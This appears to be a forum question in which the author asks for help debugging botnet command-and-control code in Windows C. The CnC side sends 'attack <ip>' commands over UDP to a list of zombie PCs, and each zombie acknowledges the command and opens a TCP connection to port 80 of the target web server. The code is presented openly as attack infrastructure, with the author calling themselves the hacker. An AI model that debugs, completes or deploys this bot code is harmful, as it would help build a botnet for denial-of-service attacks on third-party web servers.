I have a question about the communication between a CnC server and a zombie PC.

When a command is sent from the hacker, the first command gets dropped, but the second command does not get dropped.

I can't figure out where the problem is.

Here is the code.

\\\\\

Zombie

DWORD WINAPI command(LPVOID){

    int retval,strLen;

    SOCKET recv_sock;
    recv_sock = socket(AF_INET, SOCK_DGRAM, 0);

    SOCKADDR_IN servaddr;
    ZeroMemory(&servaddr, sizeof(servaddr)); // initialize the memory to 0
    servaddr.sin_family = AF_INET; // fixed, do not use another value (PF_INET)
    servaddr.sin_port = htons(70); // zombie's port number
    servaddr.sin_addr.s_addr =htonl(INADDR_ANY); // open to all IPs

    SOCKADDR_IN cncaddr;

    retval =bind(recv_sock, (SOCKADDR *)&servaddr, sizeof(servaddr));// open port 70
    if(retval == SOCKET_ERROR) return -1; // wait

    int cncaddr_sz;// variable to hold the address size
    cncaddr_sz=sizeof(cncaddr);

    while(1){
        char cmd[30]="\0";
        char *cmdptr1="";
        char *cmdptr2="";

        strLen=recvfrom(recv_sock, cmd, sizeof(cmd), 0, (SOCKADDR*)&cncaddr, &cncaddr_sz);
        MessageBox(NULL,cmd,"zombie- recv command",MB_OK);
        cmd[strLen]='\0';

        cmdptr1=strtok(cmd," \0");
        cmdptr2=strtok(NULL," \0");


        if(strcmp(cmdptr1,"attack") ==0)
        {
            char a_success[40]="attack_command_recv_success";
            strLen=sendto(recv_sock, a_success, strlen(a_success), 0, (SOCKADDR*)&cncaddr, sizeof(cncaddr));
            MessageBox(NULL,a_success,"zombie_cnc_send_success",MB_OK);

            SOCKET wep_sock=socket(AF_INET,SOCK_STREAM,0);// create a socket for TCP
            SOCKADDR_IN wep_addr;// declare the struct variable


            ZeroMemory(&wep_addr,sizeof(wep_addr));// always initialize before use

            wep_addr.sin_family=AF_INET;// look up the wep_addr struct
            wep_addr.sin_port=htons(80);// port number
            wep_addr.sin_addr.s_addr=inet_addr(cmdptr2);// nested struct; uses the preprocessor #define INADDR_ANY 0
            retval=connect(wep_sock,(SOCKADDR *)&wep_addr/* cast wep_addr's info to sockaddr */,sizeof(wep_addr));


        }
    }
}

\\\\\\\\\\\\\\

CnC

else if(strcmp(cmdptr1,"attack")==0)
    {
    //web server attack function
    SOCKET udp_sock;
    udp_sock = socket(AF_INET, SOCK_DGRAM, 0);

    // sending part
    SOCKADDR_IN zom_addr;
    ZeroMemory(&zom_addr, sizeof(zom_addr)); // initialize the memory to 0
    zom_addr.sin_family = AF_INET; // fixed, do not use another value (PF_INET)
    zom_addr.sin_port = htons(70); // server's port number

    int strLen=0;

    int zom_addr_sz;// variable to hold the address size
    zom_addr_sz=sizeof(zom_addr);

    for(int i=0;i<count;i++){
        zom_addr.sin_addr.s_addr=zlist[i]; // *zombie's IP address*

        strLen=sendto(udp_sock, cp_cmd, strlen(cp_cmd), 0, (SOCKADDR*)&zom_addr, sizeof(zom_addr));//attack command transmit
        MessageBox(NULL,cp_cmd,"send command",MB_OK);

        strLen=recvfrom(udp_sock, cmsg, sizeof(cmsg), 0
            , (SOCKADDR*)&zom_addr, &zom_addr_sz); //transmitted success message
        MessageBox(NULL,cmsg,"zom_cnc_recv_success",MB_OK);

        text=send(client_sock,cmsg,strlen(cmsg),0);//after attack, send success message
        MessageBox(NULL,cmsg,"cnc_hack_send_success",MB_OK);
    }

    }

The command reaches the CnC fine, so why does it get dropped or end up in a waiting state?